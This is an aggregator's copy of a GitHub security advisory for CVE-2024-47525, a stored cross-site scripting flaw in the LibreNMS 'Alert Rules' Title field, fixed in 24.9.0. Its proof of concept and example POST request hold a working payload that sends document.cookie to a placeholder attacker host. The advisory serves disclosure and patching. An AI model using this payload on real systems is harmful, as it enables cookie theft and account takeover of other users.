Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-j2j9-7pr6-xqwv

Опубликовано: 01 окт. 2024
Источник: github
Github: Прошло ревью
CVSS4: 5
CVSS3: 7.5

Описание

LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Rules" feature

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.

Details

The vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads.

For example, the following payload can be used: test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"

This payload triggers the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present.

The vulnerability stems from the application not sanitizing the value of $rule['name'] before adding it to the $enabled_msg variable. This is evident in the code:

https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405

PoC

  1. Create a new alert rule in the LibreNMS interface.
  2. In the "Title" field, input the following payload: test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"
  3. Save the rule and trigger the alert.
  4. Observe that when the page loads, the injected JavaScript executes and redirects the user, sending their non-httponly cookies to the attacker's server.

Example Request:

POST /ajax_form.php HTTP/1.1 Host: <your_host> X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: <your_XSRF_token> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: <your_cookie> _token=<your_token>&device_id=-1&device_name=invalid+hostname&rule_id=17&type=alert-rules&template_id=&builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22not_equal%22%2C%22value%22%3A%22test2'%5C%22%22%7D%5D%2C%22valid%22%3Atrue%7D&name=test1''+autofocus+onfocus%3D%22document.location%3D'https%3A%2F%2F<attacker_url>%2Flogger.php%3Fc%3D'%2Bdocument.cookie%22&builder_rule_0_filter=access_points.accesspoint_id&builder_rule_0_operator=not_equal&builder_rule_0_value_0=test2'%22&severity=warning&count=1&delay=1m&interval=5m&recovery=on&acknowledgement=on&maps%5B%5D=1&proc=&notes=Test2'%22&override_query=on&adv_query=select+'test3'%22'%3B

Impact

It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.

Ссылки

Пакеты

Наименование

librenms/librenms

composer
Затронутые версииВерсия исправления

< 24.9.0

24.9.0

EPSS

Процентиль: 91%
0.06404
Низкий

5 Medium

CVSS4

7.5 High

CVSS3

CVE ID

CVE-2024-47525

Дефекты

CWE-79

Связанные уязвимости

nvd логотип

CVE-2024-47525

CVSS3: 7.5
nvd
больше 1 года назад

LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. This vulnerability is fixed in 24.9.0.

fstec логотип

BDU:2024-09475

CVSS3: 7.5
fstec
больше 1 года назад

Уязвимость функции Alert Rules системы сетевого мониторинга LibreNMS, позволяющая нарушителю проводить межсайтовые сценарные атаки

EPSS

Процентиль: 91%
0.06404
Низкий

5 Medium

CVSS4

7.5 High

CVSS3

CVE ID

CVE-2024-47525

Дефекты

CWE-79